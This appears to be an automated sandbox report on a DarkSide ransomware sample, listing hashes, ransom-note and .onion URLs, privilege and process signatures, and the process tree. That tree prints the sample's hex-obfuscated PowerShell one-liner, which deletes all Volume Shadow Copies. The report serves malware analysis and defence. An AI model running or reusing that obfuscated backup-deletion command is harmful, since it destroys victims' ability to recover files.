Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
28-05-2024 05:58
Behavioral task
behavioral1
Sample
darkside.exe
Resource
win7-20240508-en
General
-
Target
darkside.exe
-
Size
17KB
-
MD5
9009593ebf5ea20407ab19bff045dc9d
-
SHA1
03c1f7458f3983c03a0f8124a01891242c3cc5df
-
SHA256
6931b124d38d52bd7cdef48121fda457d407b63b59bb4e6ead4ce548f4bbb971
-
SHA512
fe24a401b35a5b1874bc90739f6fda1969456a13e1339f5b920e6fa659e82df0febc7fc3196ea854601e8773c356884a2516b660daafa944c3643b9d0be74fed
-
SSDEEP
384:SGyUrEk/yEoQE+yckIYN/pBa3AWK3T2oTboHblKR/o:l4klFypIYFpB/x9ngbd
Malware Config
Extracted
C:\Users\README.c2995afb.TXT
darkside
http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Renames multiple (173) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/3056-0-0x00000000001D0000-0x00000000001E0000-memory.dmp upx behavioral1/memory/3056-237-0x00000000001D0000-0x00000000001E0000-memory.dmp upx -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
darkside.exepowershell.exepid process 3056 darkside.exe 3056 darkside.exe 2184 powershell.exe 3056 darkside.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
darkside.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 3056 darkside.exe Token: SeSecurityPrivilege 3056 darkside.exe Token: SeTakeOwnershipPrivilege 3056 darkside.exe Token: SeLoadDriverPrivilege 3056 darkside.exe Token: SeSystemProfilePrivilege 3056 darkside.exe Token: SeSystemtimePrivilege 3056 darkside.exe Token: SeProfSingleProcessPrivilege 3056 darkside.exe Token: SeIncBasePriorityPrivilege 3056 darkside.exe Token: SeCreatePagefilePrivilege 3056 darkside.exe Token: SeBackupPrivilege 3056 darkside.exe Token: SeRestorePrivilege 3056 darkside.exe Token: SeShutdownPrivilege 3056 darkside.exe Token: SeDebugPrivilege 3056 darkside.exe Token: SeSystemEnvironmentPrivilege 3056 darkside.exe Token: SeRemoteShutdownPrivilege 3056 darkside.exe Token: SeUndockPrivilege 3056 darkside.exe Token: SeManageVolumePrivilege 3056 darkside.exe Token: 33 3056 darkside.exe Token: 34 3056 darkside.exe Token: 35 3056 darkside.exe Token: SeDebugPrivilege 2184 powershell.exe Token: SeBackupPrivilege 2672 vssvc.exe Token: SeRestorePrivilege 2672 vssvc.exe Token: SeAuditPrivilege 2672 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
darkside.exedescription pid process target process PID 3056 wrote to memory of 2184 3056 darkside.exe powershell.exe PID 3056 wrote to memory of 2184 3056 darkside.exe powershell.exe PID 3056 wrote to memory of 2184 3056 darkside.exe powershell.exe PID 3056 wrote to memory of 2184 3056 darkside.exe powershell.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\darkside.exe"C:\Users\Admin\AppData\Local\Temp\darkside.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2184
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2672
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51104513b8798f88c6c83c67920559de3
SHA1711d09201c46a17af6292cb4d85eed65d74450f9
SHA25660d2a62e38eadc6b8e2472f9575a11c0a1c4b7740c8fe2a2e8ef29fa9cd2b81e
SHA512a0916d8952019546bb39ec09cc9dcd8937fa4d8f49d66c11d3c3b955207cc94b3099088db09f044c2bd69d2454a6797bbc8401133cb6c4051ba24b009d508cf6
-
Filesize
2KB
MD525d0b19a0ec34a39dfa3e177866f01a3
SHA1a3704d1f6499738ccd694bdd6008a850c6b2e453
SHA256f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8
SHA512ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198